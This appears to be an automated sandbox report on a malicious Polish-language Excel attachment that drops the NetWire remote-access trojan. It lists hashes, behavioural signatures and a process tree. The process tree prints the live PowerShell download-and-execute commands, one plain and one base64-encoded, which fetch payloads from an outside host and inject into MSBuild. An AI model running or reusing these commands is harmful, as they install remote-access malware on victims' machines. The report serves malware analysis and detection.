Analysis
-
max time kernel
135s -
max time network
131s -
platform
windows10_x64 -
resource
win10 -
submitted
14/07/2020, 14:07
Static task
static1
Behavioral task
behavioral1
Sample
Potwierdzenie transakcji (4).xls
Resource
win7v200430
0 signatures
0 seconds
General
-
Target
Potwierdzenie transakcji (4).xls
-
Size
858KB
-
MD5
5a70778bed8ca69ba44a0fa43198c1cb
-
SHA1
3b4cd5dc12ba90d25283a14b9db45a27b7a4313f
-
SHA256
2225eecf02d98cb9631cafc0c529102e14124d43b2364b8947c2b75ffc38660e
-
SHA512
2f865ed894592311e33e6afc415871b4d1ccfdbd189fa6a9f8690d5232ef7e67864b1ad2ad25e6ebd9bc9dd176d726aa877e0311e55e6774ae5c8225650a2161
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://office-service-softs.info/tech.jpg
Signatures
-
Blacklisted process makes network request 3 IoCs
flow pid Process 13 3832 powershell.exe 14 648 powershell.exe 21 648 powershell.exe -
NetWire RAT payload 2 IoCs
resource yara_rule behavioral2/memory/1844-2-0x0000000000400000-0x0000000000433000-memory.dmp netwire behavioral2/memory/1844-4-0x0000000000400000-0x0000000000433000-memory.dmp netwire -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 3832 344 powershell.exe 66 -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 344 wrote to memory of 3832 344 EXCEL.EXE 71 PID 344 wrote to memory of 3832 344 EXCEL.EXE 71 PID 3832 wrote to memory of 648 3832 powershell.exe 74 PID 3832 wrote to memory of 648 3832 powershell.exe 74 PID 648 wrote to memory of 1760 648 powershell.exe 76 PID 648 wrote to memory of 1760 648 powershell.exe 76 PID 648 wrote to memory of 1760 648 powershell.exe 76 PID 648 wrote to memory of 1756 648 powershell.exe 77 PID 648 wrote to memory of 1756 648 powershell.exe 77 PID 648 wrote to memory of 1756 648 powershell.exe 77 PID 648 wrote to memory of 1828 648 powershell.exe 78 PID 648 wrote to memory of 1828 648 powershell.exe 78 PID 648 wrote to memory of 1828 648 powershell.exe 78 PID 648 wrote to memory of 1844 648 powershell.exe 79 PID 648 wrote to memory of 1844 648 powershell.exe 79 PID 648 wrote to memory of 1844 648 powershell.exe 79 PID 648 wrote to memory of 1844 648 powershell.exe 79 PID 648 wrote to memory of 1844 648 powershell.exe 79 PID 648 wrote to memory of 1844 648 powershell.exe 79 PID 648 wrote to memory of 1844 648 powershell.exe 79 PID 648 wrote to memory of 1844 648 powershell.exe 79 PID 648 wrote to memory of 1844 648 powershell.exe 79 PID 648 wrote to memory of 1844 648 powershell.exe 79 PID 648 wrote to memory of 1844 648 powershell.exe 79 -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 3832 powershell.exe Token: SeDebugPrivilege 648 powershell.exe -
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 3832 powershell.exe 3832 powershell.exe 3832 powershell.exe 648 powershell.exe 648 powershell.exe 648 powershell.exe 648 powershell.exe 648 powershell.exe 648 powershell.exe 648 powershell.exe 648 powershell.exe 648 powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 648 set thread context of 1844 648 powershell.exe 79 -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Suspicious use of SetWindowsHookEx 14 IoCs
pid Process 344 EXCEL.EXE 344 EXCEL.EXE 344 EXCEL.EXE 344 EXCEL.EXE 344 EXCEL.EXE 344 EXCEL.EXE 344 EXCEL.EXE 344 EXCEL.EXE 344 EXCEL.EXE 344 EXCEL.EXE 344 EXCEL.EXE 344 EXCEL.EXE 344 EXCEL.EXE 344 EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 344 EXCEL.EXE
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Potwierdzenie transakcji (4).xls"1⤵
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: AddClipboardFormatListener
PID:344 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command IEX (New-Object('Net.WebClient')).'DoWnloadsTrInG'('http://office-service-softs.info/tech.jpg')2⤵
- Blacklisted process makes network request
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:3832 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -w 1 /e JABYAHcAIAA9ACAAJwBNAHUAZwBwAGoAcwBjAFcAQgAnADsACgAkAFAAcwBiAGIAWQBWAGwAYgBrACAAPQAgACgAJwB7ADIAfQB7ADAAfQB7ADEAfQB7ADMAfQAnAC0AZgAnAGQAUwB0ACcALAAnAHIAaQBuACcALAAcIGAARABgAG8AYAB3AG4AYABsAGAAbwBhAB0gLAAnAGcAJwApADsAWwB2AG8AaQBkAF0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkAFcAaQB0AGgAUABhAHIAdABpAGEAbABOAGEAbQBlACgAJwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAnACkAOwAkAFQAUwBRAG4AQgB6AEkAQgBhAGUAWgBzAEgAbgBIAG8AaQBRAGIAbwBPAHUAVgBtAFAAUABwAE8ARABvAGYAZwBEAEQAUgBPAEYAZgBBAHYASgBhAHQAWABlAGcAeAB3AG4AWgBpAGsAdABwAG0AbgBDAHEARgBoAGwATQBpAHAASgBZAFEAVgBDAHkAegBTAEkAcQBjAGYAZQB3AHYAagA9AFsATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMALgBJAG4AdABlAHIAYQBjAHQAaQBvAG4AXQA6ADoAQwBhAGwAbABCAHkAbgBhAG0AZQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgABwgYABOAGAAZQBgAFQAYAAuAGAAVwBgAGUAYABCAGAAQwBgAGwAYABpAGAAZQBgAE4AYABUAB0gKQAsACQAUABzAGIAYgBZAFYAbABiAGsALABbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4AQwBhAGwAbABUAHkAcABlAF0AOgA6AE0AZQB0AGgAbwBkACwAJwBoAHQAdAAnACsAWwBDAGgAYQByAF0AOAAwACsAJwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBvAGYAZgBpAGMAZQAtAHMAZQByAHYAaQBjAGUALQBzAG8AZgB0AHMALgBpAG4AZgBvAC8AcgBuAHAALgB0AHgAdAAnACkALgBSAGUAcABsAGEAYwBlACgAIgBeACIALAAgACIANAA0ACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACoAIgAsACAAIgA0ADgAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAIwAiACwAIAAiADcAOAAiACkAfABJAEUAWAA7AFsAQgB5AHQAZQBbAF0AXQAkAFQAUwBRAG4AQgB6AEkAQgBhAGUAWgBzAEgAbgBIAG8AaQBRAGIAbwBPAHUAVgBtAFAAUABwAE8ARABvAGYAZwBEAEQAUgBPAEYAZgBBAHYASgBhAHQAWABlAGcAeAB3AG4AWgBpAGsAdABwAG0AbgBDAHEARgBoAGwATQBpAHAASgBZAFEAVgBDAHkAegBTAEkAcQBjAGYAZQB3AHYAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAFAAcwBiAGIAWQBWAGwAYgBrACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAcwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBvAGYAZgBpAGMAZQAtAHMAZQByAHYAaQBjAGUALQBzAG8AZgB0AHMALgBpAG4AZgBvAC8AbQBhAGkAbgAxAC4AdAB4AHQAJwApAC4AcgBlAHAAbABhAGMAZQAoACcAQAAnACwAJwAwAHgAJwApAHwASQBFAFgAOwBbAEMALgBNAF0AOgA6AFIAKAAnAE0AUwBCAHUAaQBsAGQALgBlAHgAZQAnACwAJABUAFMAUQBuAEIAegBJAEIAYQBlAFoAcwBIAG4ASABvAGkAUQBiAG8ATwB1AFYAbQBQAFAAcABPAEQAbwBmAGcARABEAFIATwBGAGYAQQB2AEoAYQB0AFgAZQBnAHgAdwBuAFoAaQBrAHQAcABtAG4AQwBxAEYAaABsAE0AaQBwAEoAWQBRAFYAQwB5AHoAUwBJAHEAYwBmAGUAdwB2ACkA3⤵
- Blacklisted process makes network request
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetThreadContext
PID:648 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:1760
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:1756
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:1828
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:1844
-
-
-